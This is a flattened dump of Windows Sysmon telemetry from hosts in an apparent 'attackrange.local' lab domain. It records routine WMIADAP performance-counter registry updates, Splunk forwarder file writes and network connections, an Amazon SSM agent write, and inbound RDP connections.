12241200x80000000000000001056844Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-09-27 09:24:17.740{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 13241300x80000000000000001056843Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:17.740{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List26852 26858 26868 26878 26898 26942 26952 26990 26996 27012 13241300x80000000000000001056842Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:17.740{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First HelpDWORD (0x000068e5) 13241300x80000000000000001056841Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:17.740{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First CounterDWORD (0x000068e4) 13241300x80000000000000001056840Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:17.740{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last HelpDWORD (0x0000698b) 13241300x80000000000000001056839Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:17.740{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last CounterDWORD (0x0000698a) 13241300x80000000000000001056838Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:17.740{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x0000698b) 13241300x80000000000000001056837Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:17.740{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x0000698a) 23542300x80000000000000001056836Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:17.740{5EBD8912-8DB0-6151-B700-00000000FD01}5604NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\System32\PerfStringBackup.TMPMD5=B789ED3F1E4F8004A62A5E04013A257F,SHA256=6409D10C807D556D130DDE4042F03F3A06CD8F72D01D385716167D16171DBF7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056835Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:17.693{5EBD8912-8DB0-6151-B700-00000000FD01}5604NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\System32\PerfStringBackup.INIMD5=B789ED3F1E4F8004A62A5E04013A257F,SHA256=6409D10C807D556D130DDE4042F03F3A06CD8F72D01D385716167D16171DBF7F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001056834Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:17.568{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 13241300x80000000000000001056833Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:17.568{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\PerfIniFileWmiApRpl.ini 23542300x80000000000000001056832Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:17.568{5EBD8912-8DB0-6151-B700-00000000FD01}5604NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\INF\WmiApRpl\WmiApRpl.iniMD5=FFDEEA82BA4A5A65585103DD2A922DFE,SHA256=C20B11DFF802AA472265F4E9F330244EC4ACA81B0009F6EFCB2CF8A36086F390,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056831Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:17.568{5EBD8912-8DB0-6151-B700-00000000FD01}5604NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\INF\WmiApRpl\WmiApRpl.hMD5=B133A676D139032A27DE3D9619E70091,SHA256=AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056830Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:17.568{5EBD8912-8DB0-6151-B700-00000000FD01}5604NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\INF\WmiApRpl\0009\WmiApRpl.iniMD5=FFDEEA82BA4A5A65585103DD2A922DFE,SHA256=C20B11DFF802AA472265F4E9F330244EC4ACA81B0009F6EFCB2CF8A36086F390,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001056829Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-09-27 09:24:17.553{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 12241200x80000000000000001056828Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-09-27 09:24:17.553{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List 12241200x80000000000000001056827Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-09-27 09:24:17.553{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last Help 12241200x80000000000000001056826Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-09-27 09:24:17.553{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First Help 12241200x80000000000000001056825Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-09-27 09:24:17.553{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last Counter 12241200x80000000000000001056824Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-09-27 09:24:17.553{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First Counter 13241300x80000000000000001056823Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:17.553{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x000068e3) 13241300x80000000000000001056822Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:17.553{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x000068e2) 13241300x80000000000000001056821Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:17.537{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 23542300x80000000000000001056820Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:17.537{5EBD8912-8DB0-6151-B700-00000000FD01}5604NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\System32\wbem\Performance\WmiApRpl.iniMD5=FFDEEA82BA4A5A65585103DD2A922DFE,SHA256=C20B11DFF802AA472265F4E9F330244EC4ACA81B0009F6EFCB2CF8A36086F390,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056819Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:15.014{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54244-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000981345Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:12.702{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59545-false10.0.1.12-8000- 23542300x8000000000000000981344Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:17.252{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45EFFC56A9F3AFFAAD86888000E3C3D5,SHA256=FEF80CB489457A90887EC5C5C51CBE8E316900185B498606D0BAF1F8E65EBD7B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981347Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:15.447{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de51625-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981346Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:18.268{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=720D454BA0A7E4111F5DF2AE44CE7435,SHA256=F9A8CEF92BAB21862A66D4424D8F402D526A49E95C6152EC16BE54C4CFCD59A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056848Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:18.568{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=088992274F536E6DE47853668B4283D7,SHA256=E3B47076C7CC9889D8322E8D95D66E2F186ECABA6FE58202B87097FBC4FD0C42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056847Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:18.568{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=872BAC46CCAEABDCD0EC9D1EF22A4516,SHA256=8FAB45ADF040C3AE8B85A0573EC2842AC21F0C9C17C489BB9AA3E249EAB9B810,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056846Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:15.483{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54245-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001056845Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:17.990{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F48765CF6874387E3FC06C48E7B9C7F,SHA256=F1A778B66991D55B564D84163E696C13ADE3F1E07EA25E1993B0C64F38283048,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981348Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:19.284{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=025370172D9D56DB31933FBB79568F43,SHA256=D2928E4A8F7959775599D376712AF95FC44AF859A750240B196054C10C760A02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056851Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:19.662{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C763F445E9757CD73C4218C48DFF787E,SHA256=6E6C288A4D98EF2C442C056CAB9628CC3B92F50D736824FF954ACFE23516E847,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056850Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:19.662{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD6DCD1093887A6F5A2AEAE88301F7EE,SHA256=49780D948642568D46CB9EADF6DB550644F1865740FFC63BB55D28035BCE50A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056849Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:19.115{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE90B20A6EA15CFFFA4E363CA4F98439,SHA256=8E4B5AF56B030F8CDB7117900A4F5B52CAA95825A65EA2E2DA4B313A05F4D832,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981351Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:20.284{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FECD9A9C51596F133491785C3EC3E348,SHA256=89A2C0B695395A10DB52B5782F80E121887D0BB4FB966536BD536E6DCB88AC2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056853Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:20.147{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BC6E0E4655C6084D1CC27452FBB2BC7,SHA256=14C8E3BAFAB880EB21D8838A8E44BDCA398FA5CF475F5B55BF0397B82D19B0CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981350Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:20.221{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E75DA2EC28338B005510852396128891,SHA256=73D6B9EF33F2EF5D7B2AD3A98CB459322A9A72D1E2978E1856BF6FE08FEC126C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981349Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:20.221{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CFDDF5234811723B51D47178B64D2B8D,SHA256=6F18170C2FFD3D8364D79A2E994C80D9A115F873B05A2D6DBE84BF43BB5D8E5F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056852Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:18.311{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58854-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001056855Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:20.014{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54246-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056854Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:21.272{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAB4EEDECC17E9B61864441326CB1ECF,SHA256=D0F97D669987539DFDE698F8E4032EBA28E6A2F482764323DC84FE89C65BE1BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981353Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:17.890{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59546-false10.0.1.12-8000- 23542300x8000000000000000981352Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:21.315{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E00A07DF32AC9DB2EF887B6014406548,SHA256=DCA6F0840365D9CAF53EB3EE7CAB31F769885EB577EA25F9EFD942E7098EFD80,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001056869Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:22.787{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001) 13241300x80000000000000001056868Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:22.787{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000) 13241300x80000000000000001056867Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:22.787{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\ena.sys[NdisMofResource]LowDateTime:-575650048,HighDateTime:30874337***Binary mof compiled successfully 13241300x80000000000000001056866Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:22.787{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\intelppm.sys.mui[PROCESSORWMI]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000001056865Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:22.787{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\intelppm.sys[PROCESSORWMI]LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully 13241300x80000000000000001056864Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:22.787{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\mssmbios.sys.mui[MofResource]LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000001056863Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:22.787{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\mssmbios.sys[MofResource]LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully 13241300x80000000000000001056862Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:22.787{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\ACPI.sys.mui[ACPIMOFResource]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000001056861Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:22.787{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\ACPI.sys[ACPIMOFResource]LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully 13241300x80000000000000001056860Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:22.787{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\en-US\kernelbase.dll.mui[MofResourceName]LowDateTime:-1711938829,HighDateTime:30871737***Binary mof compiled successfully 13241300x80000000000000001056859Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:22.787{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\kernelbase.dll[MofResourceName]LowDateTime:1488817152,HighDateTime:30878798***Binary mof compiled successfully 12241200x80000000000000001056858Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashDeleteKey2021-09-27 09:24:22.787{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE 13241300x80000000000000001056857Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-09-27 09:24:22.787{5EBD8912-8DB0-6151-B700-00000000FD01}5604\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance DataBinary Data 23542300x80000000000000001056856Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:22.303{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23BCB3B93231BB66CCC6EA98002C8673,SHA256=8D357EC79240AFAFA1DDF9F1A4F0ACE106343DCC8174B4122831C393B0E1D9BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981355Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:22.395{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0CF1CEC6249AA847798B2E6497E9D91,SHA256=F32E2A1AF47D553B8C771A2D31667812990852F7C792AE428A95FBA08DEAED40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981354Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:22.115{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4320MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056871Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:23.544{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 